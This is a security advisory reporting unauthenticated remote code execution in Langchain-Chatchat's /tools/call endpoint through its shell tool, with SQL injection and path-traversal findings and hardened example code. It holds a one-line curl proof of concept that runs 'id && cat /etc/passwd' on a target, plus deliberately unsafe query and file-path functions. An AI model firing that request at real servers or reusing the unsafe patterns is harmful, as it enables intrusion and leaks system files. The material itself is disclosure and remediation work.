Summary
Langchain-Chatchat exposes a /tools/call API endpoint with zero authentication that can invoke any registered tool by name, including the built-in shell tool which executes arbitrary OS commands via ShellTool.run(). An unauthenticated attacker with network access can achieve full Remote Code Execution.
Vulnerable Code
# server/agent/tools_factory/shell.py
@regist_tool(title="系统命令")
def shell(query: str = Field(description="The command to execute")):
    tool = ShellTool()
    return BaseToolOutput(tool.run(tool_input=query))

# server/api_server/server_app.py - NO authentication middleware
# tool_routes.py:33 - NO auth decorator
@tool_router.post("/call", response_model=BaseResponse)
async def call_tool(name: str = Body(...), tool_input: dict = Body({})):
PoC
# Execute arbitrary commands - no authentication needed
curl -X POST http://TARGET:7861/tools/call \
-H 'Content-Type: application/json' \
-d '{"name": "shell", "tool_input": {"query": "id && cat /etc/passwd"}}'
Additional Findings
- SQL Injection in relyt_kb_service.py and pg_kb_service.py via kb_name f-string interpolation
- Path Traversal in file_chat.py - uploaded filename used in os.path.join() without validation
- The entire API server has zero authentication/authorization on ALL endpoints
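The first two findings above, shown as an added illustration that is not Langchain-Chatchat code: the unsafe pattern beside a hardened replacement for each. The sqlite3 table, the lookup_kb_* function names and the UPLOAD_ROOT directory are constructed assumptions for this example, not the project's own schema or paths.

```python
# Added example, not Langchain-Chatchat code: the two bug classes above,
# each as the unsafe pattern beside a hardened one. The sqlite3 schema,
# the lookup_kb_* names and UPLOAD_ROOT are constructed assumptions.
import os
import sqlite3


def demo_db() -> sqlite3.Connection:
    # Constructed in-memory stand-in for a knowledge-base registry table.
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE knowledge_base (kb_name TEXT, kb_info TEXT)")
    conn.executemany(
        "INSERT INTO knowledge_base VALUES (?, ?)",
        [("public_docs", "shared"), ("hr_private", "confidential")],
    )
    return conn


def lookup_kb_unsafe(conn: sqlite3.Connection, kb_name: str) -> list:
    # f-string interpolation: the caller-supplied value becomes SQL text, so a
    # quote in kb_name rewrites the WHERE clause instead of being matched.
    sql = f"SELECT kb_name FROM knowledge_base WHERE kb_name = '{kb_name}'"
    return sorted(row[0] for row in conn.execute(sql))


def lookup_kb_safe(conn: sqlite3.Connection, kb_name: str) -> list:
    # Parameterized query: the driver binds the value; it is never parsed as SQL.
    sql = "SELECT kb_name FROM knowledge_base WHERE kb_name = ?"
    return sorted(row[0] for row in conn.execute(sql, (kb_name,)))


UPLOAD_ROOT = os.path.abspath("/srv/chatchat/uploads")  # assumed upload directory


def upload_path_unsafe(filename: str) -> str:
    # os.path.join with a client-chosen name: ".." segments walk out of the root.
    return os.path.normpath(os.path.join(UPLOAD_ROOT, filename))


def upload_path_safe(filename: str) -> str:
    # Keep only the final path component, refuse empty or dot-prefixed names,
    # then confirm the resolved path is still under UPLOAD_ROOT before use.
    base = os.path.basename(filename.replace("\\", "/"))
    if base == "" or base.startswith("."):
        raise ValueError("invalid upload filename")
    full = os.path.abspath(os.path.join(UPLOAD_ROOT, base))
    if os.path.commonpath([UPLOAD_ROOT, full]) != UPLOAD_ROOT:
        raise ValueError("upload path escapes the upload directory")
    return full
```

The commonpath check is the part that matters: basename alone stops ".." segments, but checking the resolved path against the root also catches anything a later refactor lets through (symlinked roots, odd separators).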
Fix
- Add authentication middleware to the FastAPI application
- Remove or disable the shell tool in production
- If shell access is needed, implement a command allowlist
- Use parameterized queries instead of f-string SQL interpolation
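The first three fixes as plain Python functions, added here as an example and not taken from Langchain-Chatchat. The CHATCHAT_API_KEY variable name, the allowlist contents, the response dicts and the call_tool_guarded dispatcher are assumptions; the FastAPI dependency wiring is sketched in a comment rather than executed.

```python
# Added example, not Langchain-Chatchat code: the shape of the first three
# fixes as plain functions. The env var name, the allowlist contents and the
# response dicts are assumptions; the FastAPI wiring is sketched in a comment.
import hmac
import os
import shlex
import subprocess
from typing import Callable, Dict, FrozenSet, List, Optional

API_KEY_ENV = "CHATCHAT_API_KEY"                        # assumed: provisioned out of band
ALLOWED_COMMANDS = frozenset({"date", "uptime", "df"})  # assumed: what the deployment needs
SHELL_METACHARS = set("&|;<>`$(){}\n\r")                # lets one query become two commands


def check_api_key(presented: Optional[str], expected: Optional[str] = None) -> bool:
    # Constant-time comparison against the configured key; a missing or empty
    # configured key fails closed rather than open.
    if expected is None:
        expected = os.environ.get(API_KEY_ENV, "")
    if not expected or not presented:
        return False
    return hmac.compare_digest(presented.encode(), expected.encode())

# Wiring sketch for FastAPI (not executed here):
#   async def require_api_key(x_api_key: Optional[str] = Header(None)):
#       if not check_api_key(x_api_key):
#           raise HTTPException(status_code=401, detail="unauthorized")
#   tool_router = APIRouter(dependencies=[Depends(require_api_key)])


def build_argv(query: str) -> List[str]:
    # Allowlist instead of ShellTool: reject shell operators outright, split
    # with shlex, and require the program name to be on the list.
    if any(ch in SHELL_METACHARS for ch in query):
        raise ValueError("shell operators are not permitted")
    argv = shlex.split(query)
    head = argv[0] if argv else ""
    if not argv or head not in ALLOWED_COMMANDS:
        raise ValueError(f"command not in allowlist: {head!r}")
    return argv


def run_allowed_command(query: str) -> str:
    # shell=False: the argv list is executed directly, no shell parses it.
    result = subprocess.run(build_argv(query), shell=False, capture_output=True,
                            text=True, timeout=10)
    return result.stdout


def call_tool_guarded(name: str, tool_input: Dict, presented_key: Optional[str],
                      registry: Dict[str, Callable[..., object]],
                      disabled: FrozenSet[str] = frozenset({"shell"}),
                      expected_key: Optional[str] = None) -> Dict:
    # Gate for a /tools/call-style handler: authenticate first, then refuse
    # tools disabled for this deployment, then dispatch by name.
    if not check_api_key(presented_key, expected_key):
        return {"code": 401, "msg": "unauthorized"}
    if name in disabled or name not in registry:
        return {"code": 404, "msg": f"tool {name!r} is not available"}
    return {"code": 200, "data": registry[name](**tool_input)}
```

The order in call_tool_guarded is deliberate: an unauthenticated caller learns nothing about which tool names exist, and the shell tool stays unreachable by name even when it is still registered.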